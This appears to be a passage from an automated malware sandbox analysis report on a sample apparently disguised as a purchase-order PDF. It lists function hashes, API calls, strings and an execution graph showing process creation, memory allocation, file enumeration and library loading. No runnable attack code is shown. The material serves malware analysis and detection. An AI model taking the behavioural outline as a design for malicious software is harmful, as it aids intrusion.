                                                                                • Opcode Fuzzy Hash: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                                • Instruction Fuzzy Hash: EB513B31A00229BAEF11EBA9DC89FFDB7A9EF15700F14009DD606A72C1E7719E458F54
                                                                                Function 016DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: cc4ea423fd65e23e77bf6077ab55f635291a92768cd23f900ac6fa51d1a2158e
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: D981D030E052999FEF258E6CCC917FEBBB2AF46360F1F4119D861A7399C73488418B55
                                                                                Function 016BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 0170031E
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                                • Instruction ID: 0a702d95f2a747d67b1d1c3d2254a63b24a74c900a385798a130b2930f35e34b
                                                                                • Opcode Fuzzy Hash: 997e39560e214e0feb5667ff00b55ebea716846a6c53f84a3171789d6c29bb3e
                                                                                • Instruction Fuzzy Hash: B4E19D30608741DFD726CF28CC84B6ABBE1BB84364F144AADF5A58B2E1D774D985CB42
                                                                                Function 016CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 01707BAC
                                                                                • RTL: Resource at %p, xrefs: 01707B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01707B7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                                • Instruction ID: 7666088592a66616d80094d4dd895ba080295b3902d2079159c0fbc46def6a0f
                                                                                • Opcode Fuzzy Hash: cff435f2427336ce3be008bf44fa192e9d5763a490c89394ce1d5f5191894780
                                                                                • Instruction Fuzzy Hash: 7A41B0317047039BD725DE2DCC41B6AB7E5EB98B50F100A2DE9AA9B780DB71E8058B91
                                                                                Function 016CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0170728C
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 017072C1
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01707294
                                                                                • RTL: Resource at %p, xrefs: 017072A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                                • Instruction ID: 6d769f06e83daddb6815f33e2f2c7c554389969d13913f60a77fbdf0f40fddf2
                                                                                • Opcode Fuzzy Hash: a2bce8fe6d697afbce8f41471176fcedfd67b8fafca3a2c4065b0f492ffea13a
                                                                                • Instruction Fuzzy Hash: 29411031609306ABC725CE29CC42B6AF7E5FB94B10F10461CF995AB280DB30F8168BD1
                                                                                Function 01742300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                • Opcode ID: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                                • Instruction ID: 563014a51f3a1fa8674c028ce2732196d0218c9ec6c5880a46fc9e9ceaaa6d3b
                                                                                • Opcode Fuzzy Hash: 7ff02e992a60070415e9a48d5cda44b9434f5c757566ea2d641aa31c148e5c9c
                                                                                • Instruction Fuzzy Hash: 01318472A00219AFDB20DF2DDC44BEEB7F8EB44610F55455AF949E3201EB30EA548BA0
                                                                                Function 016D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 78534a15ea92d789a89ceeb2f6ce91ef977ecd850135ad0a39c53dfb988806c9
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: A591BF71E0021A9AEB34CF6DCC81ABEBBA5EF84328F14455AE955E73C0D7309941CB62
                                                                                Function 01699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                                • Instruction ID: fbc2fee0d8bcf334896e806c2d250082045b9d7df9ff3ae0ee7fc8b2ead92896
                                                                                • Opcode Fuzzy Hash: e42d82ffea1c1c0c706c003e2fbc4ba577b2e813a86ef4e3aaae9bdf13d9a176
                                                                                • Instruction Fuzzy Hash: 198119B1D002699BDB31CB54CC54BEEBBB8AB48714F1041EEEA19B7240D7309E85CFA4

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:3.7%
                                                                                Signature Coverage:1.4%
                                                                                Total number of Nodes:508
                                                                                Total number of Limit Nodes:77
                                                                                execution_graph 100311 2837302 100312 28372c0 100311->100312 100313 2837306 100311->100313 100320 2836720 100312->100320 100316 2837382 100313->100316 100347 283b290 100313->100347 100315 28372ce 100319 28372f3 100315->100319 100342 28454c0 100315->100342 100321 2836745 100320->100321 100323 2836775 100321->100323 100374 28362c0 100321->100374 100324 2836978 100323->100324 100331 2836a11 100323->100331 100381 28363d0 100323->100381 100326 28363d0 LdrInitializeThunk 100324->100326 100332 28369c6 100326->100332 100328 28368ac 100385 28494d0 100328->100385 100330 28494d0 NtClose 100330->100331 100331->100315 100332->100330 100333 28368b6 100334 28363d0 LdrInitializeThunk 100333->100334 100335 2836901 100334->100335 100336 28494d0 NtClose 100335->100336 100337 283690b 100336->100337 100338 28363d0 LdrInitializeThunk 100337->100338 100339 2836956 100338->100339 100340 28494d0 NtClose 100339->100340 100341 2836970 100340->100341 100341->100315 100343 2845524 100342->100343 100344 284555b 100343->100344 100398 2841840 100343->100398 100344->100319 100346 284553d 100346->100319 100348 283b2b6 100347->100348 100349 283b4e6 100348->100349 100410 28498e0 100348->100410 100349->100316 100351 283b332 100351->100349 100413 284c740 100351->100413 100353 283b34e 100353->100349 100355 283b422 100353->100355 100419 2848b20 100353->100419 100356 2835b30 LdrInitializeThunk 100355->100356 100358 283b441 100355->100358 100356->100358 100360 283b4ce 100358->100360 100431 2848690 100358->100431 100359 283b40a 100427 2838100 100359->100427 100368 2838100 LdrInitializeThunk 100360->100368 100361 283b3b9 100361->100349 100361->100359 100362 283b3eb 100361->100362 100423 2835b30 100361->100423 100446 28447a0 LdrInitializeThunk 100362->100446 100369 283b4dc 100368->100369 100369->100316 100370 283b4a5 100436 2848740 100370->100436 100372 283b4bf 100441 28488a0 100372->100441 100375 28362f3 100374->100375 100376 2836314 100375->100376 100388 2849030 100375->100388 100376->100323 100378 2836337 100378->100376 100379 28494d0 NtClose 100378->100379 100380 28363b7 100379->100380 100380->100323 100382 28363f5 100381->100382 100393 2848e30 100382->100393 100386 28494ed 100385->100386 100387 28494fe NtClose 100386->100387 100387->100333 100389 284904d 100388->100389 100392 3082ca0 LdrInitializeThunk 100389->100392 100390 2849079 100390->100378 100392->100390 100394 2848e4a 100393->100394 100397 3082c60 LdrInitializeThunk 100394->100397 100395 2836469 100395->100324 100395->100328 100397->100395 100399 28417dc 100398->100399 100400 28417e4 100399->100400 100401 28417f8 100399->100401 100407 2841885 100399->100407 100403 28494d0 NtClose 100400->100403 100402 28494d0 NtClose 100401->100402 100405 2841801 100402->100405 100404 28417ed 100403->100404 100404->100346 100409 284b690 RtlAllocateHeap 100405->100409 100407->100346 100408 284180c 100408->100346 100409->100408 100411 28498fd 100410->100411 100412 284990e CreateProcessInternalW 100411->100412 100412->100351 100414 284c6b0 100413->100414 100415 284c70d 100414->100415 100447 284b650 100414->100447 100415->100353 100417 284c6ea 100450 284b570 100417->100450 100420 2848b3d 100419->100420 100459 3082c0a 100420->100459 100421 283b3b0 100421->100355 100421->100361 100424 2835b4f 100423->100424 100462 2848cf0 100424->100462 100426 2835b6e 100426->100362 100428 2838113 100427->100428 100468 2848a20 100428->100468 100430 283813e 100430->100316 100432 284870a 100431->100432 100433 28486bb 100431->100433 100474 30839b0 LdrInitializeThunk 100432->100474 100433->100370 100434 284872f 100434->100370 100437 28487ba 100436->100437 100438 284876b 100436->100438 100475 3084340 LdrInitializeThunk 100437->100475 100438->100372 100439 28487df 100439->100372 100442 284891d 100441->100442 100444 28488ce 100441->100444 100476 3082fb0 LdrInitializeThunk 100442->100476 100443 2848942 100443->100360 100444->100360 100446->100359 100453 2849800 100447->100453 100449 284b66b 100449->100417 100456 2849850 100450->100456 100452 284b589 100452->100415 100454 284981a 100453->100454 100455 284982b RtlAllocateHeap 100454->100455 100455->100449 100457 284986a 100456->100457 100458 284987b RtlFreeHeap 100457->100458 100458->100452 100460 3082c1f LdrInitializeThunk 100459->100460 100461 3082c11 100459->100461 100460->100421 100461->100421 100463 2848d9d 100462->100463 100465 2848d1e 100462->100465 100467 3082d10 LdrInitializeThunk 100463->100467 100464 2848de2 100464->100426 100465->100426 100467->100464 100469 2848a9e 100468->100469 100471 2848a4e 100468->100471 100473 3082dd0 LdrInitializeThunk 100469->100473 100470 2848ac3 100470->100430 100471->100430 100473->100470 100474->100434 100475->100439 100476->100443 100477 282b500 100479 282cb71 100477->100479 100480 284b4f0 100477->100480 100483 2849640 100480->100483 100482 284b51e 100482->100479 100484 28496d5 100483->100484 100486 284966e 100483->100486 100485 28496eb NtAllocateVirtualMemory 100484->100485 100485->100482 100486->100482 100487 283c600 100489 283c629 100487->100489 100488 283c72d 100489->100488 100490 283c6d3 FindFirstFileW 100489->100490 100490->100488 100491 283c6ee 100490->100491 100492 283c714 FindNextFileW 100491->100492 100495 283c4f0 NtClose RtlAllocateHeap 100491->100495 100492->100491 100494 283c726 FindClose 100492->100494 100494->100488 100495->100491 100496 2830dc0 100497 2830dda 100496->100497 100502 2834570 100497->100502 100499 2830df8 100500 2830e3d 100499->100500 100501 2830e2c PostThreadMessageW 100499->100501 100501->100500 100504 2834594 100502->100504 100503 283459b 100503->100499 100504->100503 100506 28345ba 100504->100506 100509 284c9f0 LdrLoadDll 100504->100509 100507 28345e7 100506->100507 100508 28345de LdrLoadDll 100506->100508 100507->100499 100508->100507 100509->100506 100510 2849340 100511 28493e7 100510->100511 100512 284936e 100510->100512 100513 28493fd NtReadFile 100511->100513 100514 2832788 100515 28362c0 2 API calls 100514->100515 100516 28327b3 100515->100516 100517 2839c0f 100518 2839c1f 100517->100518 100519 2839c26 100518->100519 100520 284b570 RtlFreeHeap 100518->100520 100520->100519 100521 2833113 100526 2837d80 100521->100526 100524 28494d0 NtClose 100525 283313f 100524->100525 100527 2833123 100526->100527 100528 2837d9a 100526->100528 100527->100524 100527->100525 100532 2848bc0 100528->100532 100531 28494d0 NtClose 100531->100527 100533 2848bdd 100532->100533 100536 30835c0 LdrInitializeThunk 100533->100536 100534 2837e6a 100534->100531 100536->100534 100537 2829e10 100539 2829fce 100537->100539 100538 282a217 100539->100538 100541 284b1e0 100539->100541 100542 284b206 100541->100542 100547 2824070 100542->100547 100544 284b212 100545 284b24b 100544->100545 100550 2845620 100544->100550 100545->100538 100549 282407d 100547->100549 100554 2833220 100547->100554 100549->100544 100551 2845682 100550->100551 100553 284568f 100551->100553 100567 2831a00 100551->100567 100553->100545 100555 2833237 100554->100555 100557 2833250 100555->100557 100558 2849f10 100555->100558 100557->100549 100559 2849f2a 100558->100559 100560 28454c0 2 API calls 100559->100560 100562 2849f50 100560->100562 100561 2849f59 100561->100557 100562->100561 100563 2848b20 LdrInitializeThunk 100562->100563 100564 2849fb6 100563->100564 100565 284b570 RtlFreeHeap 100564->100565 100566 2849fcc 100565->100566 100566->100557 100568 2831a38 100567->100568 100589 2837e90 100568->100589 100570 2831a40 100571 284b650 RtlAllocateHeap 100570->100571 100588 2831d13 100570->100588 100572 2831a56 100571->100572 100573 284b650 RtlAllocateHeap 100572->100573 100574 2831a67 100573->100574 100575 284b650 RtlAllocateHeap 100574->100575 100576 2831a78 100575->100576 100600 2835f40 100576->100600 100578 2831a85 100579 28454c0 2 API calls 100578->100579 100582 2831abf 100578->100582 100580 2831aaa 100579->100580 100581 28454c0 2 API calls 100580->100581 100581->100582 100584 2831b06 100582->100584 100610 2836a20 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100582->100610 100585 2834570 2 API calls 100584->100585 100586 2831cc2 100585->100586 100606 2847f60 100586->100606 100588->100553 100590 2837ebc 100589->100590 100591 2837d80 2 API calls 100590->100591 100592 2837edf 100591->100592 100595 2837ee9 100592->100595 100597 2837f01 100592->100597 100593 2837f1d 100593->100570 100594 2837ef4 100594->100570 100595->100594 100596 28494d0 NtClose 100595->100596 100596->100594 100597->100593 100598 28494d0 NtClose 100597->100598 100599 2837f13 100598->100599 100599->100570 100601 2835f53 100600->100601 100603 2835f5d 100600->100603 100601->100578 100602 2836043 100602->100578 100603->100602 100604 28454c0 2 API calls 100603->100604 100605 28360c9 100604->100605 100605->100578 100607 2847fc1 100606->100607 100609 2847fce 100607->100609 100611 2831d30 100607->100611 100609->100588 100610->100584 100627 2838160 100611->100627 100613 2831d50 100614 2832294 100613->100614 100631 2841170 100613->100631 100614->100609 100617 2831f64 100619 284c740 2 API calls 100617->100619 100618 2831dab 100618->100614 100634 284c610 100618->100634 100621 2831f79 100619->100621 100620 2838100 LdrInitializeThunk 100623 2831fc6 100620->100623 100621->100623 100639 2830860 100621->100639 100623->100614 100623->100620 100625 2830860 LdrInitializeThunk 100623->100625 100624 2838100 LdrInitializeThunk 100626 2832117 100624->100626 100625->100623 100626->100623 100626->100624 100628 283816d 100627->100628 100629 2838195 100628->100629 100630 283818e SetErrorMode 100628->100630 100629->100613 100630->100629 100632 284b4f0 NtAllocateVirtualMemory 100631->100632 100633 2841191 100632->100633 100633->100618 100635 284c626 100634->100635 100636 284c620 100634->100636 100637 284b650 RtlAllocateHeap 100635->100637 100636->100617 100638 284c64c 100637->100638 100638->100617 100642 2849760 100639->100642 100643 284977d 100642->100643 100646 3082c70 LdrInitializeThunk 100643->100646 100644 283087f 100644->100626 100646->100644 100647 2836d90 100648 2836dba 100647->100648 100651 2837f30 100648->100651 100650 2836de1 100652 2837f4d 100651->100652 100658 2848c10 100652->100658 100654 2837f9d 100655 2837fa4 100654->100655 100656 2848cf0 LdrInitializeThunk 100654->100656 100655->100650 100657 2837fcd 100656->100657 100657->100650 100659 2848cab 100658->100659 100661 2848c3e 100658->100661 100663 3082f30 LdrInitializeThunk 100659->100663 100660 2848ce4 100660->100654 100661->100654 100663->100660 100664 2837310 100665 2837382 100664->100665 100666 2837328 100664->100666 100666->100665 100670 283afd0 100666->100670 100668 283736c 100668->100665 100669 283b290 9 API calls 100668->100669 100669->100665 100671 283aff5 100670->100671 100672 28454c0 2 API calls 100671->100672 100674 283b17c 100672->100674 100673 283b24b 100673->100668 100674->100673 100675 28454c0 2 API calls 100674->100675 100675->100673 100676 283ad50 100681 283aa60 100676->100681 100678 283ad5d 100696 283a6d0 100678->100696 100680 283ad79 100682 283aa85 100681->100682 100708 2838370 100682->100708 100685 283abd0 100685->100678 100687 283abe7 100687->100678 100689 283abde 100689->100687 100691 283acd5 100689->100691 100732 2843210 100689->100732 100736 283a120 100689->100736 100693 283ad3a 100691->100693 100747 283a490 100691->100747 100694 284b570 RtlFreeHeap 100693->100694 100695 283ad41 100694->100695 100695->100678 100697 283a6e6 100696->100697 100700 283a6f1 100696->100700 100698 284b650 RtlAllocateHeap 100697->100698 100698->100700 100699 283a718 100699->100680 100700->100699 100701 2838370 GetFileAttributesW 100700->100701 100702 283aa32 100700->100702 100705 2843210 2 API calls 100700->100705 100706 283a120 3 API calls 100700->100706 100707 283a490 3 API calls 100700->100707 100701->100700 100703 283aa4b 100702->100703 100704 284b570 RtlFreeHeap 100702->100704 100703->100680 100704->100703 100705->100700 100706->100700 100707->100700 100709 2838391 100708->100709 100710 2838398 GetFileAttributesW 100709->100710 100711 28383a3 100709->100711 100710->100711 100711->100685 100712 2843380 100711->100712 100713 284338e 100712->100713 100714 2843395 100712->100714 100713->100689 100715 2834570 2 API calls 100714->100715 100716 28433ca 100715->100716 100717 28433d9 100716->100717 100753 2842e40 LdrLoadDll LdrLoadDll 100716->100753 100719 284b650 RtlAllocateHeap 100717->100719 100728 28435a2 100717->100728 100720 28433f2 100719->100720 100721 284357d 100720->100721 100722 284340e 100720->100722 100720->100728 100724 2843587 100721->100724 100725 284362b 100721->100725 100754 2847420 NtClose RtlAllocateHeap 100722->100754 100755 2847420 NtClose RtlAllocateHeap 100724->100755 100727 284b570 RtlFreeHeap 100725->100727 100727->100728 100728->100689 100729 2843429 100729->100728 100730 284b570 RtlFreeHeap 100729->100730 100731 2843571 100730->100731 100731->100689 100733 2843226 100732->100733 100735 2843331 100732->100735 100734 28454c0 2 API calls 100733->100734 100733->100735 100734->100733 100735->100689 100737 283a146 100736->100737 100738 28454c0 2 API calls 100737->100738 100739 283a1ad 100738->100739 100756 283db70 100739->100756 100741 283a1b8 100743 283a340 100741->100743 100744 283a1d6 100741->100744 100742 283a325 100742->100689 100743->100742 100745 2839fe0 RtlFreeHeap 100743->100745 100744->100742 100767 2839fe0 100744->100767 100745->100743 100748 283a4b6 100747->100748 100749 28454c0 2 API calls 100748->100749 100750 283a532 100749->100750 100751 283db70 3 API calls 100750->100751 100752 283a53d 100751->100752 100752->100691 100753->100717 100754->100729 100755->100728 100757 283db7b 100756->100757 100758 28454c0 2 API calls 100757->100758 100759 283db94 100758->100759 100760 283dba1 100759->100760 100761 28454c0 2 API calls 100759->100761 100760->100741 100762 283dbb8 100761->100762 100762->100760 100763 28454c0 2 API calls 100762->100763 100764 283dbd7 100763->100764 100765 284b570 RtlFreeHeap 100764->100765 100766 283dbe4 100765->100766 100766->100741 100768 2839ffd 100767->100768 100771 283dc00 100768->100771 100770 283a103 100770->100744 100772 283dc24 100771->100772 100773 283dcce 100772->100773 100774 284b570 RtlFreeHeap 100772->100774 100773->100770 100774->100773 100775 2846090 100776 28460ea 100775->100776 100778 28460f7 100776->100778 100779 2843aa0 100776->100779 100780 284b4f0 NtAllocateVirtualMemory 100779->100780 100782 2843ae1 100780->100782 100781 2843bee 100781->100778 100782->100781 100783 2834570 2 API calls 100782->100783 100785 2843b27 100783->100785 100784 2843b70 Sleep 100784->100785 100785->100781 100785->100784 100786 2848ad0 100787 2848aed 100786->100787 100790 3082df0 LdrInitializeThunk 100787->100790 100788 2848b15 100790->100788 100791 28491d0 100792 2849284 100791->100792 100794 28491ff 100791->100794 100793 284929a NtCreateFile 100792->100793 100795 2848950 100796 284897e 100795->100796 100797 28489df 100795->100797 100800 3082ee0 LdrInitializeThunk 100797->100800 100798 2848a10 100800->100798 100801 3082ad0 LdrInitializeThunk 100802 283f860 100803 283f8c4 100802->100803 100804 28362c0 2 API calls 100803->100804 100806 283f9f7 100804->100806 100805 283f9fe 100806->100805 100807 28363d0 LdrInitializeThunk 100806->100807 100809 283fa7a 100807->100809 100808 283fba3 100809->100808 100810 283fbb2 100809->100810 100831 283f640 100809->100831 100811 28494d0 NtClose 100810->100811 100814 283fbbc 100811->100814 100813 283fab6 100813->100810 100815 283fac1 100813->100815 100816 284b650 RtlAllocateHeap 100815->100816 100817 283faea 100816->100817 100818 283faf3 100817->100818 100819 283fb09 100817->100819 100820 28494d0 NtClose 100818->100820 100840 283f530 CoInitialize 100819->100840 100822 283fafd 100820->100822 100823 283fb17 100843 2848f90 100823->100843 100825 283fb92 100826 28494d0 NtClose 100825->100826 100827 283fb9c 100826->100827 100828 284b570 RtlFreeHeap 100827->100828 100828->100808 100829 283fb35 100829->100825 100830 2848f90 LdrInitializeThunk 100829->100830 100830->100829 100832 283f65c 100831->100832 100833 2834570 2 API calls 100832->100833 100835 283f67a 100833->100835 100834 283f683 100834->100813 100835->100834 100836 2834570 2 API calls 100835->100836 100837 283f74e 100836->100837 100838 2834570 2 API calls 100837->100838 100839 283f7ab 100837->100839 100838->100839 100839->100813 100842 283f595 100840->100842 100841 283f62b CoUninitialize 100841->100823 100842->100841 100844 2848faa 100843->100844 100847 3082ba0 LdrInitializeThunk 100844->100847 100845 2848fda 100845->100829 100847->100845 100853 2840160 100854 284017d 100853->100854 100855 2834570 2 API calls 100854->100855 100856 284019b 100855->100856 100859 28387ea 100860 28387ef 100859->100860 100863 28387db 100859->100863 100861 283882b 100860->100861 100862 28454c0 2 API calls 100860->100862 100861->100863 100865 28370b0 100861->100865 100862->100861 100866 28370c6 100865->100866 100867 283711e 100865->100867 100868 28454c0 2 API calls 100866->100868 100867->100863 100869 28370d8 100868->100869 100869->100867 100874 2836f20 LdrLoadDll LdrLoadDll 100869->100874 100871 28370ff 100871->100867 100872 28454c0 2 API calls 100871->100872 100873 2837115 100872->100873 100873->100863 100874->100871 100875 2829db0 100877 2829dbf 100875->100877 100876 2829e00 100877->100876 100878 2829ded CreateThread 100877->100878 100879 28322b0 100880 28322e6 100879->100880 100881 2848b20 LdrInitializeThunk 100879->100881 100884 2849570 100880->100884 100881->100880 100883 28322fb 100885 28495fc 100884->100885 100887 284959b 100884->100887 100889 3082e80 LdrInitializeThunk 100885->100889 100886 284962d 100886->100883 100887->100883 100889->100886 100890 2835bb0 100891 2835be0 100890->100891 100892 2838100 LdrInitializeThunk 100890->100892 100894 2835c2a 100891->100894 100895 2835c0c 100891->100895 100896 2838080 100891->100896 100892->100891 100897 28380c4 100896->100897 100898 28380e5 100897->100898 100903 28487f0 100897->100903 100898->100891 100900 28380d5 100901 28380f1 100900->100901 100902 28494d0 NtClose 100900->100902 100901->100891 100902->100898 100904 284886d 100903->100904 100906 284881e 100903->100906 100908 3084650 LdrInitializeThunk 100904->100908 100905 2848892 100905->100900 100906->100900 100908->100905 100914 2849430 100915 28494a4 100914->100915 100916 284945b 100914->100916 100917 28494ba NtDeleteFile 100915->100917 100923 2841b30 100924 2841b49 100923->100924 100925 28454c0 2 API calls 100924->100925 100930 2841b66 100925->100930 100926 2841bd9 100927 2841b94 100928 284b570 RtlFreeHeap 100927->100928 100929 2841ba4 100928->100929 100930->100926 100930->100927 100931 2841bd4 100930->100931 100932 284b570 RtlFreeHeap 100931->100932 100932->100926

                                                                                Executed Functions

                                                                                Function 0283C600 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0283C6E4
                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0283C71F
                                                                                • FindClose.KERNELBASE(?), ref: 0283C72A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                • Instruction ID: 546a45cac8f8dee51570b6d453925c0123ee6137fb0ccfffe61207a2a87c63a9
                                                                                • Opcode Fuzzy Hash: 0bcd0ed3e76a3e13bba6a3f69d416f9609b832d3224101b31c1df1672a9431be
                                                                                • Instruction Fuzzy Hash: 513172BD9002097BDB21DFA8CC85FFA77BD9B44744F104559B90CF7180DBB0AA948BA1
                                                                                Function 028491D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?,?,?), ref: 028492CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                • Instruction ID: 643a976964c85c51865d588f8db2fb8ec9c6ef45640d4e9fc4b64f4d24e657cd
                                                                                • Opcode Fuzzy Hash: 041070744bf495d413e60ee7f098dc23643cf720cfc8c4fd3fcc99ce66d5656b
                                                                                • Instruction Fuzzy Hash: D331D6B9A01648AFDB14DF99D841EDEB7B9EF8C714F108209F918A7341D730A851CFA5
                                                                                Function 02849340 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,?,?,635CE8B4,?,?,?,?), ref: 02849426
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 19e5f510a2379a7b0105218b5c10e5d434f5aa5545959674cace4c4f58d775f2
                                                                                • Instruction ID: 0f816d7257cb3e7cb4ceb53c64530cb8541d20cdb86caa5d85044357b471dd50
